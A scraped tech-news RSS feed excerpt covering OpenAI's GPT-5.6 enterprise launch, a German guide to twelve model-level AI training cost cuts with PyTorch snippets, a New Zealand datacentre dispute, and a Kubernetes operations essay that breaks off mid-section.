<h2 class="wp-block-heading">Enterprise AI shifts from experimentation to economics</h2>



<p>ChatGPT Work combines GPT-5.6 with enterprise integrations and agentic capabilities that allow users to perform multi-step tasks across connected business applications instead of interacting with AI through isolated prompts. OpenAI said the platform is designed to help organizations automate knowledge work while maintaining enterprise-grade governance and security.</p>



<p>The launch comes as enterprises move beyond AI experimentation and begin deploying models across production workloads, making inference costs a growing concern for CIOs.</p>



<p>“The AI wave has brought productivity gains, but rising token consumption has also created bill shocks for enterprises,” said Neil Shah, vice president for research and partner at Counterpoint Research. “This is forcing organizations to adopt different models for different workloads, making performance per dollar the key metric.”</p>



<p>Faisal Kawoosa, co-founder and chief analyst at Techarc, said enterprises are now evaluating AI investments more pragmatically.</p>



<p>“The exploratory stage of AI is over,” he said. “Organizations can derive value from AI today, but performance per dollar will determine whether it becomes part of everyday business operations or remains an ad hoc tool.”</p>



<h2 class="wp-block-heading">Tiered models for different workloads</h2>



<p>GPT-5.6 Sol is OpenAI’s flagship model for complex reasoning, Terra targets mainstream enterprise applications, and Luna is designed for lower-cost, high-volume deployments.</p>



<p>According to OpenAI, GPT-5.6 Sol scored 53.6 on Agents’ Last Exam, a benchmark for long-running professional workflows, outperforming competing frontier models while requiring significantly lower compute costs.</p>



<p>The company also introduced two new reasoning modes. The max mode allocates additional compute for complex problems, while ultra coordinates four AI agents in parallel to accelerate demanding workflows.</p>



<p>“Ultra goes further by coordinating four agents in parallel by default, trading higher token use for stronger results and faster time-to-result on demanding tasks,” the statement added.</p>



<p>Shah said the architecture reflects how enterprises are increasingly orchestrating multiple AI models.</p>



<p>“GPT-5.6 gives enterprise architects flexibility to route workloads from Luna to Sol depending on whether they require automation, logic, or complex reasoning,” he said.</p>



<p>Kawoosa added that the tiered approach aligns with how enterprise software has traditionally been consumed.</p>



<p>“It gives enterprises of different sizes the flexibility to optimize technology consumption according to their requirements,” he said.</p>



<h2 class="wp-block-heading">Coding, productivity, and security gains</h2>



<p>OpenAI said GPT-5.6 Sol achieved a score of 80 on the Artificial Analysis Coding Agent Index while consuming fewer than half the output tokens of competing models. It also reported state-of-the-art results on Terminal-Bench 2.1 and DeepSWE, benchmarks that measure real-world software engineering tasks.</p>



<p>The company said the models also improve enterprise productivity through stronger document generation capabilities and integrations with Microsoft 365, Google Drive, Slack, and Notion.</p>



<p>On cybersecurity, GPT-5.6 Sol scored 73.5% on ExploitBench, up from 47.9% for GPT-5.5, and nearly doubled its predecessor’s performance on ExploitGym.</p>



<p>“GPT-5.6 supports important defensive tasks such as secure code review, patching, threat modeling, and blue teaming,” OpenAI said.</p>



<h2 class="wp-block-heading">Security remains an enterprise focus</h2>



<p>OpenAI said GPT-5.6 incorporates its “most robust safeguards to date,” combining model-level protections with real-time monitoring and extensive safety testing, including approximately 700,000 GPU hours of automated red-team evaluations.</p>



<p>Shah said layered guardrails and monitoring could become an important differentiator for enterprise deployments.</p>



<p>Kawoosa, however, said CIOs will continue demanding greater transparency before fully trusting frontier AI systems.</p>



<p>“Competition among LLM providers will continue, with vendors constantly testing and challenging each other’s guardrails,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[12 Wege, KI kostengünstiger zu trainieren]]></title>
<description><![CDATA[Eine KI zu trainieren, kann schnell monetäre Sorgen bereiten – muss es aber nicht.  ultramansk | shutterstock.com



KI-Pipelines zu optimieren, erfordert mehr als nur oberflächliche Hardwareanpassungen. Es gilt, die Art und Weise, wie Modelle Daten verarbeiten, grundlegend zu verändern. Zwar imp...]]></description>
<link>https://tsecurity.de/de/3658655/it-security-nachrichten/12-wege-ki-kostenguenstiger-zu-trainieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658655/it-security-nachrichten/12-wege-ki-kostenguenstiger-zu-trainieren/</guid>
<pubDate>Fri, 10 Jul 2026 06:07:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/ultramansk_shutterstock_2672055281_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Dev Team sceptical 16z9" class="wp-image-4192249" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Eine KI zu trainieren, kann schnell monetäre Sorgen bereiten – muss es aber nicht.  </figcaption></figure><p class="imageCredit">ultramansk | shutterstock.com</p></div>



<p><a href="https://www.computerwoche.de/article/4183987/embedding-pipelines-sind-das-neue-etl.html" target="_blank">KI-Pipelines</a> zu optimieren, erfordert mehr als nur oberflächliche Hardwareanpassungen. Es gilt, die Art und Weise, wie Modelle Daten verarbeiten, grundlegend zu verändern. Zwar implementieren KI-Engineers oft einfache Effizienzmaßnahmen innerhalb des Training-Loops. Aber um die Trainingskosten permanent <a href="https://www.computerwoche.de/article/4182741/nur-jedes-vierte-unternehmen-hat-seine-ki-kosten-im-blick.html" target="_blank">zu reduzieren</a>, sind architektonische Änderungen nötig – direkt im neuronalen Netz.</p>



<p>Die folgenden zwölf Optimierungsmaßnahmen auf Modellebene verwandeln Ihre <a href="https://www.cio.de/article/4168849/die-ki-strategie-der-commerzbank.html" target="_blank">KI-Strategie</a> von einem Brute-Force-Hardware-Ansatz in eine elegante, softwaredefinierte Disziplin – und senken die Stückkosten Ihrer KI-Pipeline drastisch.</p>



<h2 class="wp-block-heading">1. Pretraining einsparen</h2>



<p>Ein Foundation-Modell von Grund auf neu zu trainieren ist für Standard Enterprise-Applikationen selten nötig und verbietet sich mit Blick auf die dafür nötige Rechenleistung. Statt dafür Millionen zu verschwenden, sollten Engineering-Teams lieber öffentlich verfügbare <a href="https://www.computerwoche.de/article/4146975/wie-ki-open-source-verandert.html" target="_blank">Open-Weight-Modelle</a> nutzen.</p>



<p>Dieser grundlegende Transfer-Learning-Ansatz ist der unverzichtbare erste Schritt, wenn es darum geht, interne Chatbots oder domänenspezifische Klassifikatoren zu entwickeln. Indem bestehende neuronale Architekturen zum Einsatz kommen, lassen sich die enormen <a href="https://www.computerwoche.de/article/2828262/finetuning-ist-teuer-aber-oft-lohnt-es-sich.html" target="_blank">Kosten</a> (auch für Energie), die mit den initialen Pretraining-Phasen verbunden sind, umgehen.</p>



<h2 class="wp-block-heading">2. Parametereffizient feinabstimmen</h2>



<p>Selbst das standardmäßige Feintuning von umfassenden Sprachmodellen erforderte immense Mengen an VRAM, um die States von Optimizern und Gradienten zu speichern. Um dieses Hardware-Bottleneck aufzulösen, sollten Engineers <a href="https://medium.com/@MUmarAmanat/fine-tune-llm-with-peft-60b2798f1e5f" target="_blank" rel="noreferrer noopener">PEFT</a>-Techniken wie <a href="https://www.computerwoche.de/article/3552133/forscher-verbinden-wi-fi-und-lora.html" target="_blank">LoRA</a> implementieren.</p>



<p>Die Technik reduziert den Memory Overhead drastisch, indem sie dafür sorgt, dass 99 Prozent der vortrainierten Weights „eingefroren“ und kleine, trainier- und adaptierbare Layer injiziert werden. Dieser mathematische Shortcut ist ideal geeignet, um hochgradig anpassbare GenAI-Funktionen umzusetzen – und erlaubt die Feinabstimmung von Milliarden von Parametern mit einer einzigen (Consumer-)<a href="https://www.computerwoche.de/article/3967958/was-ist-eine-gpu.html" target="_blank">GPU</a>.</p>



<pre class="wp-block-code"><code>python
from peft import LoraConfig, get_peft_model

config = LoraConfig(r=8, lora_alpha=32, target_modules=["q_proj", "v_proj"])
efficient_model = get_peft_model(base_model, config)</code></pre>



<h2 class="wp-block-heading">3. Warmstart-Layer einziehen</h2>



<p>Falls Sie spezifische Netzwerkkomponenten von Grund auf neu trainieren müssen, stellt der Import vortrainierter Embeddings sicher, dass nur die verbleibenden Layer erhöhten Rechenaufwand verursachen.</p>



<p>Dieser „Warmstart“-Ansatz reduziert den Rechenaufwand in Frühphasen der KI-Entwicklung erheblich, weil das Modell so grundlegende, universelle Datenrepräsentationen nicht erst neu erlernen muss. Besonders empfehlenswert ist dieser für <a href="https://www.computerwoche.de/article/4173136/17-llms-fur-spezialdomanen.html" target="_blank">Spezialdomänen</a>.</p>



<pre class="wp-block-code"><code>python
# PyTorch warm-start example
model.embedding_layer.weight.data.copy_(pretrained_medical_embeddings)
model.embedding_layer.requires_grad = False
</code></pre>



<h2 class="wp-block-heading">4. Gradient Checkpointing anwenden</h2>



<p>Memory-Engpässe sind der wesentliche Grund dafür, dass Entwickler gezwungen sind, teure, VRAM-intensive Cloud-Instanzen zu mieten. <a href="https://arxiv.org/pdf/1604.06174" target="_blank" rel="noreferrer noopener">Gradient Checkpointing</a> (PDF) spart Speicherplatz ein, indem bestimmte Forward Activations während der Backpropagation neu berechnet werden – anstatt sie alle zu speichern.</p>



<p>Entwicklern ist zu empfehlen, diese Technik einzusetzen, wenn sie mit anhaltenden „Out of Memory“-Fehlern konfrontiert sind. Denn Gradient Checkpointing ermöglicht es, zehnmal größere Netzwerke auf derselben GPU unterzubringen – bei einem Mehr an Rechenaufwand von circa 20 Prozent.</p>



<pre class="wp-block-code"><code>python
# Enable in Hugging Face / PyTorch
model.gradient_checkpointing_enable()</code></pre>



<h2 class="wp-block-heading">5. Compiler-Fusion aktivieren</h2>



<p>Moderne Deep-Learning-Frameworks leiden regelmäßig unter Engpässen mit Blick auf die Speicherbandbreite, da ständig Daten über die Hardware gelesen und geschrieben werden. Durch Compiler, die wie <a href="https://openxla.org/?hl=de" target="_blank" rel="noreferrer noopener">XLA</a> oder <a href="https://pytorch.org/get-started/pytorch-2-x/" target="_blank" rel="noreferrer noopener">PyTorch 2.0</a> auf Graph-Ebene operieren, lässt sich eine Vielzahl von Prozessen in einem einzelnen GPU-Kernel fusionieren.</p>



<p>Diese architektonische Optimierung führt dazu, dass Durchsatz und Ausführungsgeschwindigkeit massiv gesteigert werden. Parallel sind allerdings keine manuellen Änderungen am Code notwendig. Um die Hardwareauslastung zu maximieren, ist es Entwickler-Teams zu empfehlen, die Compiler-Fusion standardmäßig bei sämtlichen Trainings-Sessions in der Produktion zu aktivieren.</p>



<pre class="wp-block-code"><code>python
import torch

# PyTorch 2.0 compiler fusion
optimized_model = torch.compile(model)</code></pre>



<h2 class="wp-block-heading">6. Pruning und Quantisierung einsetzen</h2>



<p>Ein umfangreiches, vollpräzises 16-Bit-Neural-Network in der Produktion bereitzustellen, erfordert ebenfalls oft teure Cloud-Instanzen, was die Gewinnmarge einer Applikation zunichtemachen kann. Durch algorithmisches Pruning werden mathematisch redundante Weights entfernt.</p>



<p>Eine Quantisierung des Modells sorgt hingegen dafür, dass die verbleibenden Parameter von 16-Bit-Gleitkommazahlen auf 8-Bit- oder 4-Bit-Ganzzahlen komprimiert werden. Das ermöglicht es, das KI-Modell auf deutlich kostengünstigeren GPUs mit geringerem Speicherbedarf auszuführen – ohne dass die Qualität der Konversationen darunter leidet. Diese physikalische Reduktion ist entscheidend dafür, Traffic-intensive Anwendungen kosteneffizient skalieren zu können. Davon abgesehen senkt es jedoch auch die CO²-Kosten, die ein API-Call <a href="https://www.cio.com/article/4132293/the-carbon-cost-of-an-api-call.html" target="_blank">verursacht</a>, wenn Tausende von Usern parallel bedient werden.</p>



<pre class="wp-block-code"><code>python
import torch
import torch.nn.utils.prune as prune

# 1. Prune 20% of the lowest-magnitude weights in a layer
prune.l1_unstructured(model.fc, name="weight", amount=0.2)

# 2. Dynamic Quantization (Compress Float32 to Int8)
quantized_model = torch.ao.quantization.quantize_dynamic(
    model, {torch.nn.Linear}, dtype=torch.qint8
)</code></pre>



<h2 class="wp-block-heading">7. Curriculum Learning verwenden</h2>



<p>Ein untrainiertes neuronales Netzwerk mit hochkomplexen und gleichzeitig verrauschten Datensätzen zu füttern, zwingt den Optimizer teure Extra-Rechenschleifen zu drehen, um chaotische Gradienten abzubilden. Dieses Problem lässt sich mit <a href="https://medium.com/aiguys/curriculum-learning-83b1b2221f33" target="_blank" rel="noreferrer noopener">Curriculum Learning</a> (auch Lehrplanlernen) lösen: Dabei wird die Daten-Pipeline so strukturiert, dass zunächst klare, leicht klassifizierbare Beispiele eingeführt werden – bevor der schrittweise Übergang auf hochpräzise Anomalien erfolgt.</p>



<p>Geht es etwa darum, ein Vision-Modell für autonomes Fahren zu trainieren, sollten die Entwickler diesem zunächst klare Tageslichtbilder von Autobahnen zuführen, bevor sie Rechenleistung für komplexe Nachtaufnahmen verschneiter Stadtkreuzungen in Städten aufwenden. Dieser schrittweise Ansatz ermöglicht dem Netzwerk, zentrale mathematische Merkmale ressourcenschonend abzubilden. Dadurch wird die Konvergenz deutlich schnell und mit geringerem Hardware-Aufwand erreicht.</p>



<h2 class="wp-block-heading">8. Wissen destillieren</h2>



<p>Ein massives KI-Modells mit 70 Milliarden Parametern für simple, repetitive Tasks zu nutzen, kommt einer gravierenden Fehlallokation von Rechenressourcen gleich. Dieses Problem lässt sich mithilfe von Wissensdestillation lösen: Dabei lernt ein hocheffizientes, schlankes „Student“-Modell, die Reasoning-Ketten eines großen „Teacher“-Modells exakt nachzuahmen.</p>



<p>Stellen Sie sich ein E-Commerce-Unternehmen vor, das Produktempfehlungen in Echtzeit direkt auf dem Smartphone eines Nutzers ausführen muss, wo Akku und Speicher streng limitiert sind. Dank Knowledge Distillation kann dieses winzige Mobile-Modell mit der Genauigkeit einer massiven, Cloud-basierten Architektur arbeiten. Das senkt die Inferenzkosten dauerhaft und kann Ihnen außerdem ersparen, in die „<a href="https://www.vktr.com/ai-technology/the-ai-accuracy-trap/" target="_blank" rel="noreferrer noopener">AI Accuracy Trap</a>“ zu tappen.</p>



<h2 class="wp-block-heading">9. Suchmethoden optimieren</h2>



<p>Herkömmliche Grid-Search-Algorithmen fressen regelmäßig große Teil des Cloud-Budgets, weil sie blindlings Netzwerkkonfigurationen testen und ausführen, die von vornherein zum Scheitern verurteilt sind. Intelligentere Hyperparameter-Suchmethoden wie die <a href="https://de.wikipedia.org/wiki/Bayes%E2%80%99sche_Optimierung" target="_blank" rel="noreferrer noopener">Bayes’sche Optimierung</a> und <a href="https://arxiv.org/abs/1603.06560" target="_blank" rel="noreferrer noopener">Hyperband</a> können an dieser Stelle als finanzielle Wächter fungieren: Sie sagen unzureichende Versuche mathematisch vorher und sortieren diese direkt aus.</p>



<p>Optimiert eine Bank beispielsweise ein KI-Modell zur Betrugserkennung, kann Hyperband Konfigurationen aufspüren, die nicht akkurat sind – und lenkt die gesamte Rechenleistung ausschließlich auf die vielversprechendsten Setups um. Um die Kosten weiter zu reduzieren, lässt sich zudem auch das <a href="https://github.com/Jayachander123/RES-Cost-Aware-Retraining-Framework" target="_blank" rel="noreferrer noopener">RES-Cost-Aware-Retraining-Framework</a> integrieren.</p>



<h2 class="wp-block-heading">10. Parallelstrategien fahren</h2>



<p>Nicht sachgemäß konfigurierte Cluster führen ebenfalls zu massiven Netzwerk-Bottlenecks. Wenn Sie ein Modell mittlerer Größe auf zu viele GPUs aufteilen (Modellparallelität), verbringen die Prozessoren mehr Zeit damit, auf die Datenübertragung zu warten, als damit, tatsächlich Berechnungen durchzuführen.</p>



<p>Umgekehrt ist es bei der Verarbeitung großer Datensätze hocheffizient, das gesamte Modell über mehrere Knoten (Datenparallelität) zu replizieren – vorausgesetzt, die Batch-Größen sind korrekt abgestimmt. Ein FinOps-Team in der Praxis muss diese Parallelstrategien dynamisch an die jeweilige Architektur anpassen und dabei sicherstellen, dass die GPUs nicht <a href="https://www.computerwoche.de/article/4163759/gpu-effizienz-verdoppeln-ohne-zusatzkosten.html" target="_blank">in den Idle-Status verfallen</a>, während das Netzwerk aufholt.</p>



<h2 class="wp-block-heading">11. Asynchron evaluieren</h2>



<p>Standardmäßige Trainings-Pipelines sorgen ständig dafür, dass das primäre (und teure) GPU-Cluster eine Pause einlegen muss. Einfach nur, um routinemäßige Validierungsprüfungen der Modellfortschritte durchzuführen. Anders ausgedrückt: Es ist eine katastrophale Geldverschwendung.</p>



<p>Indem Engineering-Teams asynchrone Evaluierung implementieren, lassen sich die Validierungsprüfungen auf eine separate, wesentlich kostengünstigere CPU- oder Low-Tier-GPU-Instanz auslagern. Die primären, kostenintensiven GPUs möglichst voll auszulasten, ist eine verpflichtende architektonische Trennung. Diese trägt dazu bei, die versteckten Betriebskosten abzumildern, die mit der <a href="https://www.computerwoche.de/article/4030328/so-verandert-ki-ihre-grc-strategie.html" target="_blank">KI-Governance</a> einhergehen. </p>



<h2 class="wp-block-heading">12. Daten kuratieren</h2>



<p>Riesige Datensätze blind zu verarbeiten, sorgt ebenfalls dafür, dass teure Compute-Zeit verschwendet wird – in diesem Fall für redundante Informationen von minderer Qualität.</p>



<p>Wenn ein visuelles KI-Modell bereits zehntausend identische Fotos eines Standard-Stoppschilds erfasst hat, liefert es keinerlei Mehrwert, noch einmal ein paar mehr nachzulegen. Algorithmisches Sampling zu nutzen, um informationsreiche Subsets zu kuratieren, resultiert in identischer Modell-Performance – zu einem Bruchteil der Hardwarekosten. (fm)</p>



<p><strong>Dieser Beitrag wurde im Rahmen des </strong><a href="https://www.infoworld.com/article/4168496/12-model-level-deep-cuts-to-slash-ai-training-costs.html" target="_blank"><strong>englischsprachigen Expert Contributor Network</strong></a><strong> von Foundry veröffentlicht. Alle Infos zum deutschsprachigen Experten-Netzwerk </strong><a href="https://www.computerwoche.de/experten/" target="_blank"><strong>finden Sie hier</strong></a><strong>.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘A lot of red flags’: plans for New Zealand’s first datacentre spark concern as locals demand greater transparency]]></title>
<description><![CDATA[Plans to build a NZ$3.5bn datacentre in Makarewa in the country’s south has drawn concern about electricity and water use, and potential noise pollutionPeople living near the site of New Zealand’s first planned AI datacentre are calling for more transparency about the project, especially about ho...]]></description>
<link>https://tsecurity.de/de/3658470/ai-nachrichten/a-lot-of-red-flags-plans-for-new-zealands-first-datacentre-spark-concern-as-locals-demand-greater-transparency/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658470/ai-nachrichten/a-lot-of-red-flags-plans-for-new-zealands-first-datacentre-spark-concern-as-locals-demand-greater-transparency/</guid>
<pubDate>Fri, 10 Jul 2026 02:48:14 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Plans to build a NZ$3.5bn datacentre in Makarewa in the country’s south has drawn concern about electricity and water use, and potential noise pollution</p><p>People living near the site of New Zealand’s first planned AI datacentre are calling for more transparency about the project, especially about how the centre’s huge electricity and water use and potential noise pollution could affect them.</p><p>Singapore-based company Datagrid has secured approval to build a NZ$3.5bn (US$2bn) AI datacentre on a 49-hectare site in Makarewa, just north of New Zealand’s southern-most city, Invercargill. Construction is due to begin this year, with the centre becoming operational by 2028.</p> <a href="https://www.theguardian.com/world/2026/jul/10/new-zealand-first-datacentre-concern-locals-makarewa-invercargill-datagrid">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Remember when I posted about my trap for bots hitting 10 million loads on here? Well it's 50 million now.]]></title>
<description><![CDATA[submitted by    /u/Glade_Art   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3658142/linux-tipps/remember-when-i-posted-about-my-trap-for-bots-hitting-10-million-loads-on-here-well-its-50-million-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658142/linux-tipps/remember-when-i-posted-about-my-trap-for-bots-hitting-10-million-loads-on-here-well-its-50-million-now/</guid>
<pubDate>Thu, 09 Jul 2026 22:10:07 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/Glade_Art"> /u/Glade_Art </a> <br> <span><a href="https://gladeart.com/blog/dead-internet-theory-is-real-50-million-bots-trapped-in-my-bot-pit">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1urwzux/remember_when_i_posted_about_my_trap_for_bots/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Evolving Windows vulnerability management to meet the speed of AI-powered discovery]]></title>
<description><![CDATA[Windows has adapted to emerging threats for decades, all while operating at unparalleled scale. It's our responsibility to bring clarity, transparency and sustained investment so customers understand what is happening, what Microsoft is doing and how
The post Evolving Windows vulnerability manage...]]></description>
<link>https://tsecurity.de/de/3657786/it-nachrichten/evolving-windows-vulnerability-management-to-meet-the-speed-of-ai-powered-discovery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657786/it-nachrichten/evolving-windows-vulnerability-management-to-meet-the-speed-of-ai-powered-discovery/</guid>
<pubDate>Thu, 09 Jul 2026 19:02:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows has adapted to emerging threats for decades, all while operating at unparalleled scale. It's our responsibility to bring clarity, transparency and sustained investment so customers understand what is happening, what Microsoft is doing and how</p>
<p>The post <a href="https://blogs.windows.com/windowsexperience/2026/07/09/evolving-windows-vulnerability-management-to-meet-the-speed-of-ai-powered-discovery/">Evolving Windows vulnerability management to meet the speed of AI-powered discovery</a> appeared first on <a href="https://blogs.windows.com/windowsexperience">Windows Experience Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Expanding AI transparency in ads]]></title>
<description><![CDATA[We're introducing new AI transparency features to help people understand the ads they see and give advertisers simple disclosure tools.]]></description>
<link>https://tsecurity.de/de/3657613/it-nachrichten/expanding-ai-transparency-in-ads/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657613/it-nachrichten/expanding-ai-transparency-in-ads/</guid>
<pubDate>Thu, 09 Jul 2026 18:02:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Expanding_AI_transparency_hero.max-600x600.format-webp.webp">We're introducing new AI transparency features to help people understand the ads they see and give advertisers simple disclosure tools.]]></content:encoded>
</item>
<item>
<title><![CDATA[Practical challenges in managing Kubernetes at enterprise scale]]></title>
<description><![CDATA[The first time I used Kubernetes in an enterprise setting, I understood the hype. It gives every team the same way to package, deploy and run their apps. No more custom scripts or unique deployment hacks, just one control plane to rule them all. And really, that’s why it’s so popular with big com...]]></description>
<link>https://tsecurity.de/de/3656431/ai-nachrichten/practical-challenges-in-managing-kubernetes-at-enterprise-scale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656431/ai-nachrichten/practical-challenges-in-managing-kubernetes-at-enterprise-scale/</guid>
<pubDate>Thu, 09 Jul 2026 11:03:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The first time I used Kubernetes in an enterprise setting, I understood the hype. It gives every team the same way to package, deploy and run their apps. No more custom scripts or unique deployment hacks, just one control plane to rule them all. And really, that’s why it’s so popular with big companies: <a href="https://kubernetes.io/">Kubernetes</a> is an open-source system for automating deployment, scaling and management of containerized applications. It says so right on the box, and that’s what people want. But here’s the truth: Kubernetes doesn’t erase operational headaches. It just moves them around.</p>



<p>When your Kubernetes install is small, it feels like rocket fuel for engineers. At enterprise scale, though, suddenly it’s about governance, not just engineering. The game is no longer “Can we get this container running?” It’s “How do hundreds of engineers roll out their stuff safely, consistently, securely and without breaking the bank or burning out the platform team?”</p>



<p>This is where the fun really starts.</p>



<h2 class="wp-block-heading">YAML isn’t the enemy</h2>



<p>Folks new to Kubernetes obsesses over manifests, Helm charts, namespaces, ingress rules, deployments, all that stuff. But they’re not the hardest part once you start scaling. The real beast is standardization.</p>



<p>Every big company I’ve seen ends up with teams going their own way. One group writes beautiful deployment templates. Someone else copies and pastes from a two-year-old manifest. Some folks set resource requirements properly. Others skip them entirely. One team sticks to a strong naming convention, and someone else throws together random namespaces and service accounts that make sense only to them. Individually, this more or less works. At scale, when the whole platform has to operate like one system, it’s a mess.</p>



<p>That’s why I’ll say it: you don’t just need a Kubernetes cluster. You need a paved road. This would involve ensuring that there are approved templates, good deployment patterns, observability, security controls as defaults, good issue escalation processes and accountability.</p>



<p>There is no need for developers to be Kubernetes experts just to release their services. The best enterprise Kubernetes setups work like real products. They let application teams self-serve but never let anyone veer off road without good reason.</p>



<h2 class="wp-block-heading">RBAC: necessary, but never enough</h2>



<p>Security is paramount. Kubernetes supports <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/">role-based access control (RBAC)</a>, so on paper you can control who does what. In practice, in a big company, RBAC gets confusing fast.</p>



<p>The issue isn’t that engineers ignore security. It’s that permissions grow over time. You need a quick fix during an incident, so you give a service account more access. Maybe a team needs cluster-wide rights for a migration. That “just for now” permission sticks around because no one cleans it up. Month by month, the gap widens between what a workload should do and what it’s actually allowed to do. The only thing that works long-term: treat RBAC as a living thing, not a one-time checklist. Review it. Test it. Stick to least privilege. Service accounts get only what they need. Cluster-admin rights? Rare. Expiring exceptions. Set permissions as code so changes aren’t invisible.</p>



<p>Same story with workload security. Kubernetes brings you <a href="https://kubernetes.io/docs/concepts/security/pod-security-standards/">Pod Security Standards</a>. There is baseline, restricted and privileged profiles, so everyone speaks the same language. But simply setting a standard isn’t enough. We’d also need things like admission controls, image scanning, runtime monitoring and audit trails.</p>



<p>Honestly, the NSA/CISA Kubernetes Hardening Guidance is still gold. Scan containers and pods. Run workloads as locked down as possible. Use strong authentication. Separate networks. Set up solid logging. These ideas sound obvious until you see what happens when your organization scales without good ops.</p>



<h2 class="wp-block-heading">Network policies: where “it should work” meets reality</h2>



<p>Kubernetes networking can trip up even the best teams. Engineers often think different namespaces mean automatic isolation between apps. Not true.</p>



<p><a href="https://kubernetes.io/docs/concepts/services-networking/network-policies/">Kubernetes network policies</a> decide which pods can talk to which, but the policies only matter if your networking plugin actually enforces them. I’ve seen a lot of teams write network controls that look great in YAML but don’t work, because the underlying network just ignores them. Security validation beats documentation every time. If two namespaces shouldn’t talk, test it. If a workload only needs access to a specific backend, check it. If only specific ingress is allowed, make sure nothing else gets through.</p>



<p>At scale, your Kubernetes security has to prove itself. “We have a policy” means nothing unless the platform can show the policy actually works.</p>



<h2 class="wp-block-heading">Resource management becomes all about money</h2>



<p>One of the biggest challenge is resource allocation. Kubernetes lets you set CPU and memory limits, and sure, there are official docs. But getting these numbers right is tough.</p>



<p>Set them too low, and your workload might get throttled or evicted under load. Set them too high, and you’re paying for unused infrastructure. That barely registers on a small cluster, but when you’re running thousands of pods? That’s cloud bills gone wild.</p>



<p>This is where Kubernetes ops and FinOps meet. Platform teams have to know who’s burning through which resources, what’s over-provisioned or flying blind, and where the real money goes. ResourceQuota helps keep things in check, but quotas alone don’t hold people accountable.</p>



<p>The culture shift is moving from “the cluster has spare capacity” to “every service has an owner, a cost profile and a plan for staying lean.” Teams should understand their infrastructure bill. Platform teams need dashboards that point out waste. Engineering leaders need to care about efficiency, not just hear from finance when things go off the rails.</p>



<h2 class="wp-block-heading">Autoscaling isn’t a magic trick</h2>



<p>The Horizontal Pod Autoscaler is handy. It adjusts your workloads automatically to match demand. But don’t overestimate it. Most real-world services don’t scale simply by CPU or memory. Sometimes a service hits latency limits before CPU usage spikes. Workers chewing through queues? You care more about backlog size. Machine learning? Maybe it’s all about GPU use or loading time. Customer-facing apps? You want to be scaled up before traffic hits, not scramble after users start complaining.</p>



<p><br>So autoscaling isn’t just a box you check. It’s a feedback loop, and it only works if you use the right signals. Sometimes CPU is enough. Sometimes you need to scale on queue length, request rate, latency or something totally custom.</p>



<p>Then there’s node autoscaling to provision infrastructure in response to demand. On paper, it just works. In real life, it runs into startup delays, availability zones, quotas, cloud provider quirks and pod disruption budgets. Scale pods faster than nodes? Users still see delays.</p>



<p>Test autoscaling like you test your app. Load-test it, break it, see what happens after an incident. Otherwise, you’ll find the limits when it hurts most.</p>



<h2 class="wp-block-heading">Observability doesn’t matter unless it answers questions</h2>



<p>Kubernetes has mountains of data. Things like  logs, metrics, traces, events, audits, deployment history, container restarts, control plane noise, you name it. The real challenge isn’t collecting info, but actually it’s making sense of it. The CNCF and others have best practices for logging and telemetry, like centralizing logs and not leaking secrets. Those matter, but at the end of the day, engineers need answers, not just data. When something breaks, no one’s asking, “Is Kubernetes alive?” They want to know what changed. Did something roll out? Did a pod crash? Did autoscaling fire too late? Was a node unhealthy, a secret rotated, a network policy too tight, a downstream DB choking?</p>



<p>Observability should line up with real operational questions and not just ticking boxes for logs, or metrics. Dashboards need to match service ownership. Alerts need to mean something to end users. Telemetry should connect to deployments and incidents. Measure how quickly engineers spot the root cause, not just that you have the data somewhere.</p>



<p>CNCF talks about newer models of unified telemetry and proactive troubleshooting for a reason. All the dashboards in the world don’t help when your team has to play detective during an outage.</p>



<h2 class="wp-block-heading">Upgrades: Don’t wing it</h2>



<p>Kubernetes upgrades catch people out. The CNCF Maturity Model says: Kubernetes drops three big releases a year, so maintenance is part of life—not a once-in-a-blue-moon project.</p>



<p>Upgrading at enterprise scale can involve everything: workloads, admission controllers, CI/CD, service mesh, ingress, storage drivers, monitoring, security, custom controllers. <a href="https://kubernetes.io/releases/version-skew-policy/">Version skew policies</a> keep you between the lines, but that’s just the beginning. The real question is: can you test your whole stack?</p>



